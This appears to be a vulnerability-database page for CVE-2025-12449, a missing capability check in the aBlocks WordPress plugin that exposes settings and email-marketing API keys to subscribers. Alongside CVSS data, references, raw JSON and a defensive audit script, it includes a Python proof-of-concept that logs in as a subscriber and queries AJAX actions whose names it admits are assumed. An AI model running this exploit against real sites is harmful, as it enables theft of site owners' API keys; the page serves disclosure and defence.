Security Vulnerability Report
CVE-2025-12449 CVSS 5.4 MEDIUM

CVE-2025-12449

Published: 2026-01-07 12:16:47
Last Modified: 2026-04-15 00:35:42

Description

The aBlocks – WordPress Gutenberg Blocks plugin for WordPress is vulnerable to unauthorized modification of data and disclosure of sensitive information due to missing capability checks on multiple AJAX actions in all versions up to, and including, 2.4.0. This makes it possible for authenticated attackers, with subscriber level access and above, to read plugin settings including block visibility, maintenance mode configuration, and third-party email marketing API keys, as well as read sensitive configuration data including API keys for email marketing services.
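The pattern behind this CVE is a logged-in-only AJAX action (a `wp_ajax_*` hook) whose callback never asks WordPress whether the caller is allowed to do what it does; since `wp_ajax_*` fires for every authenticated user, a subscriber gets the same answer an administrator would. As an added example (not code from this page or from the aBlocks project), the script below runs a static audit of that pattern over a constructed, hypothetical plugin file: it lists every `add_action('wp_ajax_...')` registration, locates the callback body, and reports whether the body calls a capability function (`current_user_can` and friends) and whether it verifies a nonce. The `hyp_*` names and the sample source are invented for the example; note that a nonce check alone does not fix the class of bug, because a nonce that the plugin hands to all logged-in users proves intent, not authorization.

```python
"""Static audit for CWE-862 (missing authorization) in WordPress plugin AJAX
handlers: find every add_action('wp_ajax_*', ...) registration and check whether
the callback body performs a capability check and a nonce check.

Added example, not aBlocks code: the plugin source below is constructed and the
hyp_* names are hypothetical."""
import re

# Constructed sample of a plugin file with one unprotected handler, one fully
# protected handler and one handler that verifies a nonce but no capability.
SAMPLE_PLUGIN_SOURCE = r'''<?php
class Hypothetical_Settings_Handler {
    public function __construct() {
        add_action( 'wp_ajax_hyp_get_settings', array( $this, 'get_settings' ) );
        add_action( 'wp_ajax_hyp_save_settings', [ $this, 'save_settings' ] );
        add_action( 'wp_ajax_hyp_export', 'hyp_export_settings' );
    }

    // Vulnerable: wp_ajax_* hooks fire for every logged-in user, so a subscriber
    // can read an option that may hold third-party API keys.
    public function get_settings() {
        wp_send_json_success( get_option( 'hyp_settings' ) );
    }

    // Hardened: nonce check and capability check before the option is touched.
    public function save_settings() {
        check_ajax_referer( 'hyp_settings_nonce', 'nonce' );
        if ( ! current_user_can( 'manage_options' ) ) {
            wp_send_json_error( 'forbidden', 403 );
        }
        update_option( 'hyp_settings', wp_unslash( $_POST['settings'] ) );
        wp_send_json_success();
    }
}

// Half-hardened: the nonce is verified, but a nonce handed to all logged-in
// users by a localized script does not prove authorization.
function hyp_export_settings() {
    check_ajax_referer( 'hyp_settings_nonce', 'nonce' );
    wp_send_json_success( get_option( 'hyp_settings' ) );
}
'''

# add_action( 'wp_ajax_<name>', array( $this, 'method' ) | [ $this, 'method' ] | 'function' )
REGISTRATION_RE = re.compile(
    r"""add_action\(\s*['"](?P<hook>wp_ajax_[\w-]+)['"]\s*,\s*"""
    r"""(?:(?:array\s*\(|\[)\s*\$this\s*,\s*['"](?P<method>\w+)['"]|['"](?P<func>\w+)['"])"""
)
CAPABILITY_RE = re.compile(r"\b(?:current_user_can|current_user_can_for_blog|user_can)\s*\(")
NONCE_RE = re.compile(r"\b(?:check_ajax_referer|check_admin_referer|wp_verify_nonce)\s*\(")


def extract_function_body(src, name):
    """Return the body of `function name(...) { ... }` by brace matching.
    Braces inside strings or comments are not special-cased: this is an audit
    pass, not a PHP parser."""
    m = re.search(r"\bfunction\s+" + re.escape(name) + r"\s*\([^)]*\)\s*\{", src)
    if not m:
        return None
    depth, i = 1, m.end()
    while i < len(src) and depth:
        if src[i] == "{":
            depth += 1
        elif src[i] == "}":
            depth -= 1
        i += 1
    return src[m.end():i - 1]


def audit_ajax_handlers(src):
    """One finding per wp_ajax_* registration found in src."""
    findings = []
    for m in REGISTRATION_RE.finditer(src):
        callback = m.group("method") or m.group("func")
        body = extract_function_body(src, callback)
        findings.append({
            "hook": m.group("hook"),
            "callback": callback,
            # nopriv hooks serve unauthenticated requests; a capability check
            # there is meaningless, so they are reported but never flagged.
            "privileged": not m.group("hook").startswith("wp_ajax_nopriv_"),
            "body_found": body is not None,
            "capability_check": bool(body and CAPABILITY_RE.search(body)),
            "nonce_check": bool(body and NONCE_RE.search(body)),
        })
    return findings


def missing_capability_checks(src):
    """Findings matching the CVE's pattern: a logged-in-only AJAX action whose
    callback never calls a capability function (a nonce alone does not count)."""
    return [f for f in audit_ajax_handlers(src)
            if f["privileged"] and f["body_found"] and not f["capability_check"]]


if __name__ == "__main__":
    flagged = {f["hook"] for f in missing_capability_checks(SAMPLE_PLUGIN_SOURCE)}
    for f in audit_ajax_handlers(SAMPLE_PLUGIN_SOURCE):
        verdict = "MISSING CAPABILITY CHECK" if f["hook"] in flagged else "ok"
        print(f"{f['hook']:<28} -> {f['callback']:<20} "
              f"cap={f['capability_check']!s:<5} nonce={f['nonce_check']!s:<5} {verdict}")
```

Run against a real plugin tree, the same two functions would be pointed at each PHP file; a handler flagged by `missing_capability_checks` is a candidate, not a confirmed finding, since the capability check may live in a helper the callback calls (the referenced `abstract-request-handler.php` is the kind of place to look), so the next step is to confirm with a differential request as subscriber and as administrator.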

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No CPE configuration data is available for this entry; the affected product per the description is:

aBlocks – WordPress Gutenberg Blocks plugin for WordPress, all versions up to and including 2.4.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-12449 PoC - aBlocks WordPress Plugin Unauthorized Access
# This PoC demonstrates the permission bypass vulnerability in the aBlocks plugin
# Requires: a valid WordPress account with subscriber-level access or higher
import requests

TARGET_URL = "http://target-wordpress-site.com"
USERNAME = "attacker"
PASSWORD = "attacker_password"


def exploit_ablocks_settings():
    """Exploit the missing capability check in aBlocks AJAX handlers."""
    session = requests.Session()

    # Step 1: log in to WordPress as the low-privileged (subscriber) account.
    login_data = {
        'log': USERNAME,
        'pwd': PASSWORD,
        'wp-submit': 'Log In',
        'testcookie': '1',
    }
    session.post(TARGET_URL + "/wp-login.php", data=login_data, allow_redirects=True)

    # WordPress names its auth cookie wordpress_logged_in_<hash>, so test for the
    # prefix rather than for an exact cookie name.
    if not any(name.startswith('wordpress_logged_in_') for name in session.cookies.keys()):
        print("[-] Login failed!")
        return False
    print("[+] Login successful!")

    # Step 2: call the settings AJAX actions as the subscriber. The action names
    # below are the ones this PoC assumes; confirm them against
    # includes/ajax/settings.php of the affected release before trusting a result.
    exploit_actions = [
        'ablocks_get_settings',
        'ablocks_read_config',
        'ablocks_get_api_keys',
    ]

    accessible = False
    for action in exploit_actions:
        print(f"[*] Testing action: {action}")
        exploit_data = {
            'action': action,
            # The PoC assumes the nonce value is not verified. If the handler does
            # call check_ajax_referer(), admin-ajax.php answers "-1" (HTTP 403) and
            # the nonce has to be taken from the script the plugin localizes for
            # logged-in users (see the assets.php reference below).
            'nonce': 'any_value_as_nonce_not_checked',
        }
        response = session.post(TARGET_URL + "/wp-admin/admin-ajax.php", data=exploit_data)

        # admin-ajax.php answers an unregistered action with "0" (HTTP 400) and a
        # failed nonce check with "-1", so an HTTP 200 alone is not proof of access.
        body = response.text.strip()
        if response.status_code == 200 and body not in ('0', '-1'):
            print("[+] Endpoint accessible without proper authorization!")
            print(f"[+] Response: {response.text[:500]}")
            accessible = True
        else:
            print(f"[-] Not accessible (HTTP {response.status_code}, body {body[:20]!r})")
    return accessible


if __name__ == "__main__":
    print("CVE-2025-12449 PoC - aBlocks Plugin Permission Bypass")
    print("=" * 60)
    exploit_ablocks_settings()
```

References

Weakness: CWE-862 (Missing Authorization)

https://plugins.trac.wordpress.org/browser/ablocks/tags/2.4.0/includes/ajax/settings.php#L16
https://plugins.trac.wordpress.org/browser/ablocks/tags/2.4.0/includes/assets.php#L353
https://plugins.trac.wordpress.org/browser/ablocks/tags/2.4.0/includes/classes/abstract-request-handler.php#L486
https://www.wordfence.com/threat-intel/vulnerabilities/id/c10600ae-1ff0-4f12-ae53-39d9342640f4?source=cve

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-12449",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-07T12:16:46.710",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The aBlocks – WordPress Gutenberg Blocks plugin for WordPress is vulnerable to unauthorized modification of data and disclosure of sensitive information due to missing capability checks on multiple AJAX actions in all versions up to, and including, 2.4.0. This makes it possible for authenticated attackers, with subscriber level access and above, to read plugin settings including block visibility, maintenance mode configuration, and third-party email marketing API keys, as well as read sensitive configuration data including API keys for email marketing services."
      },
      {
        "lang": "es",
        "value": "El plugin aBlocks – WordPress Gutenberg Blocks para WordPress es vulnerable a la modificación no autorizada de datos y a la divulgación de información sensible debido a la falta de comprobaciones de capacidad en múltiples acciones AJAX en todas las versiones hasta la 2.4.0, inclusive. Esto permite a atacantes autenticados, con acceso de nivel de suscriptor y superior, leer la configuración del plugin, incluyendo la visibilidad de los bloques, la configuración del modo de mantenimiento y las claves API de marketing por correo electrónico de terceros, así como leer datos de configuración sensibles, incluyendo claves API para servicios de marketing por correo electrónico."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N",
            "baseScore": 5.4,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 2.5
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-862"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/browser/ablocks/tags/2.4.0/includes/ajax/settings.php#L16",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/browser/ablocks/tags/2.4.0/includes/assets.php#L353",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/browser/ablocks/tags/2.4.0/includes/classes/abstract-request-handler.php#L486",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/c10600ae-1ff0-4f12-ae53-39d9342640f4?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}
```